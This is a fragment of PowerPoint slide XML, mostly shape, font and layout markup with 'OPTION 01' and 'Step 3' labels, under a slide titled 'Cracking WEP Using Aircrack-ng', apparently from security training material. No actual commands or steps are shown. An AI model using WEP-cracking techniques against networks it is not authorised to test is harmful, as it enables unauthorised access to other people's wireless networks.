                <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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7pPr>
                <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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8pPr>
                <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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9pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914217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228600" algn="l"/>
                    <a:tab pos="457200" algn="l"/>
                    <a:tab pos="685800" algn="l"/>
                    <a:tab pos="914400" algn="l"/>
                    <a:tab pos="1143000" algn="l"/>
                    <a:tab pos="1371600" algn="l"/>
                    <a:tab pos="1600200" algn="l"/>
                    <a:tab pos="1828800" algn="l"/>
                    <a:tab pos="2057400" algn="l"/>
                    <a:tab pos="2286000" algn="l"/>
                    <a:tab pos="2514600" algn="l"/>
                    <a:tab pos="2743200" algn="l"/>
                    <a:tab pos="2971800" algn="l"/>
                    <a:tab pos="3200400" algn="l"/>
                    <a:tab pos="3429000" algn="l"/>
                    <a:tab pos="3657600" algn="l"/>
                    <a:tab pos="3886200" algn="l"/>
                    <a:tab pos="4114800" algn="l"/>
                    <a:tab pos="4343400" algn="l"/>
                    <a:tab pos="4572000" algn="l"/>
                  </a:tabLst>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="F1F0F0"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                    <a:ea typeface="SimSun" charset="0"/>
                    <a:cs typeface="Roboto Black" charset="0"/>
                  </a:rPr>
                  <a:t>OPTION 01</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Freeform 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71DB553-515C-4777-85D8-6B6A95652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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8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defTabSz="91421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85" name="Rectangle 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{426C7951-9650-409D-8DCC-8B75B5038BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135998" y="4758311"/>
            <a:ext cx="740933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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Step 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="Group 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFE9467C-6D2B-4B74-A04A-BBE728C55DBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="8060422" y="2462945"/>
            <a:ext cx="3976028" cy="1608175"/>
            <a:chOff x="9691313" y="2247258"/>
            <a:chExt cx="3373922" cy="984970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Freeform 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{061EDE7A-2F80-4982-B310-CBA39B24E27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2055961" y="2418158"/>
              <a:ext cx="1009274" cy="814070"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1837"/>
                <a:gd name="T1" fmla="*/ 0 h 1954"/>
                <a:gd name="T2" fmla="*/ 0 w 1837"/>
                <a:gd name="T3" fmla="*/ 0 h 1954"/>
                <a:gd name="T4" fmla="*/ 1836 w 1837"/>
                <a:gd name="T5" fmla="*/ 0 h 1954"/>
                <a:gd name="T6" fmla="*/ 1836 w 1837"/>
                <a:gd name="T7" fmla="*/ 1825 h 1954"/>
                <a:gd name="T8" fmla="*/ 0 w 1837"/>
                <a:gd name="T9" fmla="*/ 1825 h 1954"/>
                <a:gd name="T10" fmla="*/ 0 w 1837"/>
                <a:gd name="T11" fmla="*/ 0 h 1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37" h="1954">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="603" y="137"/>
                    <a:pt x="1234" y="137"/>
                    <a:pt x="1836" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1836" y="611"/>
                    <a:pt x="1836" y="1214"/>
                    <a:pt x="1836" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1234" y="1953"/>
                    <a:pt x="603" y="1953"/>
                    <a:pt x="0" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1214"/>
                    <a:pt x="0" y="611"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8E8E8"/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defTabSz="91421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0B8B8737-2FFD-44B7-AC3F-E3C4963CAE91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9691313" y="2247258"/>
              <a:ext cx="2672030" cy="931679"/>
              <a:chOff x="9691313" y="2247258"/>
              <a:chExt cx="2672030" cy="931679"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="69" name="Freeform 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B778780C-A89E-41DD-8882-BC4E3738C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12055961" y="2247258"/>
                <a:ext cx="307382" cy="931679"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 558 w 559"/>
                  <a:gd name="T1" fmla="*/ 2236 h 2237"/>
                  <a:gd name="T2" fmla="*/ 0 w 559"/>
                  <a:gd name="T3" fmla="*/ 1817 h 2237"/>
                  <a:gd name="T4" fmla="*/ 0 w 559"/>
                  <a:gd name="T5" fmla="*/ 0 h 2237"/>
                  <a:gd name="T6" fmla="*/ 558 w 559"/>
                  <a:gd name="T7" fmla="*/ 420 h 2237"/>
                  <a:gd name="T8" fmla="*/ 558 w 559"/>
                  <a:gd name="T9" fmla="*/ 2236 h 2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9" h="2237">
                    <a:moveTo>
                      <a:pt x="558" y="2236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="2236"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8">
                  <a:lumMod val="75000"/>
                </a:srgb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defTabSz="91421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" name="Freeform 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03F67860-45AD-48BA-A170-DE402BF72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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="162F3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21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" name="Text Box 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382DA8CD-2028-4F8C-BACB-31250C8D8C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flipH="1">
                <a:off x="10310914" y="2440210"/>
                <a:ext cx="1776513" cy="35466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/>
              <a:lstStyle>
                <a:lvl1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1pPr>
                <a:lvl2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2pPr>
                <a:lvl3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3pPr>
                <a:lvl4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4pPr>
                <a:lvl5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5pPr>
                <a:lvl6pPr marL="2514600" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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6pPr>
                <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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7pPr>
                <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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8pPr>
                <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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9pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914217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228600" algn="l"/>
                    <a:tab pos="457200" algn="l"/>
                    <a:tab pos="685800" algn="l"/>
                    <a:tab pos="914400" algn="l"/>
                    <a:tab pos="1143000" algn="l"/>
                    <a:tab pos="1371600" algn="l"/>
                    <a:tab pos="1600200" algn="l"/>
                    <a:tab pos="1828800" algn="l"/>
                    <a:tab pos="2057400" algn="l"/>
                    <a:tab pos="2286000" algn="l"/>
                    <a:tab pos="2514600" algn="l"/>
                    <a:tab pos="2743200" algn="l"/>
                    <a:tab pos="2971800" algn="l"/>
                    <a:tab pos="3200400" algn="l"/>
                    <a:tab pos="3429000" algn="l"/>
                    <a:tab pos="3657600" algn="l"/>
                    <a:tab pos="3886200" algn="l"/>
                    <a:tab pos="4114800" algn="l"/>
                    <a:tab pos="4343400" algn="l"/>
                    <a:tab pos="4572000" algn="l"/>
                  </a:tabLst>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="F1F0F0"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                    <a:ea typeface="SimSun" charset="0"/>
                    <a:cs typeface="Roboto Black" charset="0"/>
                  </a:rPr>
                  <a:t>OPTION 01</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="72" name="Freeform 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0FFB40-6A4B-4791-AEFA-8B3D1D042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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8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defTabSz="91421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1281E0B2-3481-4FF2-B231-F786028329A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="8060422" y="1138472"/>
            <a:ext cx="3976028" cy="984970"/>
            <a:chOff x="9691313" y="2247258"/>
            <a:chExt cx="3373922" cy="984970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Freeform 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C341514-E2BC-4A71-9E90-210D5AD04EB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2055961" y="2418158"/>
              <a:ext cx="1009274" cy="814070"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1837"/>
                <a:gd name="T1" fmla="*/ 0 h 1954"/>
                <a:gd name="T2" fmla="*/ 0 w 1837"/>
                <a:gd name="T3" fmla="*/ 0 h 1954"/>
                <a:gd name="T4" fmla="*/ 1836 w 1837"/>
                <a:gd name="T5" fmla="*/ 0 h 1954"/>
                <a:gd name="T6" fmla="*/ 1836 w 1837"/>
                <a:gd name="T7" fmla="*/ 1825 h 1954"/>
                <a:gd name="T8" fmla="*/ 0 w 1837"/>
                <a:gd name="T9" fmla="*/ 1825 h 1954"/>
                <a:gd name="T10" fmla="*/ 0 w 1837"/>
                <a:gd name="T11" fmla="*/ 0 h 1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37" h="1954">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="603" y="137"/>
                    <a:pt x="1234" y="137"/>
                    <a:pt x="1836" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1836" y="611"/>
                    <a:pt x="1836" y="1214"/>
                    <a:pt x="1836" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1234" y="1953"/>
                    <a:pt x="603" y="1953"/>
                    <a:pt x="0" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1214"/>
                    <a:pt x="0" y="611"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8E8E8"/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defTabSz="91421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2AC996C9-DC09-4A5A-8E14-188F9C2A2703}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9691313" y="2247258"/>
              <a:ext cx="2672030" cy="931679"/>
              <a:chOff x="9691313" y="2247258"/>
              <a:chExt cx="2672030" cy="931679"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="60" name="Freeform 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F34E20F-E5EC-48A4-9362-62453C36E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12055961" y="2247258"/>
                <a:ext cx="307382" cy="931679"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 558 w 559"/>
                  <a:gd name="T1" fmla="*/ 2236 h 2237"/>
                  <a:gd name="T2" fmla="*/ 0 w 559"/>
                  <a:gd name="T3" fmla="*/ 1817 h 2237"/>
                  <a:gd name="T4" fmla="*/ 0 w 559"/>
                  <a:gd name="T5" fmla="*/ 0 h 2237"/>
                  <a:gd name="T6" fmla="*/ 558 w 559"/>
                  <a:gd name="T7" fmla="*/ 420 h 2237"/>
                  <a:gd name="T8" fmla="*/ 558 w 559"/>
                  <a:gd name="T9" fmla="*/ 2236 h 2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9" h="2237">
                    <a:moveTo>
                      <a:pt x="558" y="2236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="2236"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8">
                  <a:lumMod val="75000"/>
                </a:srgb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defTabSz="91421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" name="Freeform 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4417F361-DD72-433B-8929-D891E0A4D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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="162F3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21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" name="Text Box 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27325AF5-A1F9-4D93-A039-3E742CECD5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flipH="1">
                <a:off x="10310914" y="2440210"/>
                <a:ext cx="1776513" cy="35466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/>
              <a:lstStyle>
                <a:lvl1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1pPr>
                <a:lvl2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2pPr>
                <a:lvl3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3pPr>
                <a:lvl4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4pPr>
                <a:lvl5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5pPr>
                <a:lvl6pPr marL="2514600" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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6pPr>
                <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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7pPr>
                <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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8pPr>
                <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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9pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914217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228600" algn="l"/>
                    <a:tab pos="457200" algn="l"/>
                    <a:tab pos="685800" algn="l"/>
                    <a:tab pos="914400" algn="l"/>
                    <a:tab pos="1143000" algn="l"/>
                    <a:tab pos="1371600" algn="l"/>
                    <a:tab pos="1600200" algn="l"/>
                    <a:tab pos="1828800" algn="l"/>
                    <a:tab pos="2057400" algn="l"/>
                    <a:tab pos="2286000" algn="l"/>
                    <a:tab pos="2514600" algn="l"/>
                    <a:tab pos="2743200" algn="l"/>
                    <a:tab pos="2971800" algn="l"/>
                    <a:tab pos="3200400" algn="l"/>
                    <a:tab pos="3429000" algn="l"/>
                    <a:tab pos="3657600" algn="l"/>
                    <a:tab pos="3886200" algn="l"/>
                    <a:tab pos="4114800" algn="l"/>
                    <a:tab pos="4343400" algn="l"/>
                    <a:tab pos="4572000" algn="l"/>
                  </a:tabLst>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="F1F0F0"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                    <a:ea typeface="SimSun" charset="0"/>
                    <a:cs typeface="Roboto Black" charset="0"/>
                  </a:rPr>
                  <a:t>OPTION 01</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="63" name="Freeform 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{309CBE85-D4CC-4ADD-AD8F-DAD4D18EF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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8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defTabSz="91421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C6370A8-D716-4BAA-B34A-7290843FDA1C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141413" y="97242"/>
            <a:ext cx="9909175" cy="708804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Cracking WEP Using Aircrack-ng</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1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360644" y="1063052"/>
            <a:ext cx="7593385" cy="3077133"/>
            <a:chOff x="250117" y="359484"/>
            <a:chExt cx="7370064" cy="2986635"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="250117" y="374319"/>
              <a:ext cx="7370064" cy="2971800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="293659" y="396939"/>
              <a:ext cx="7292998" cy="2909791"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200"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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
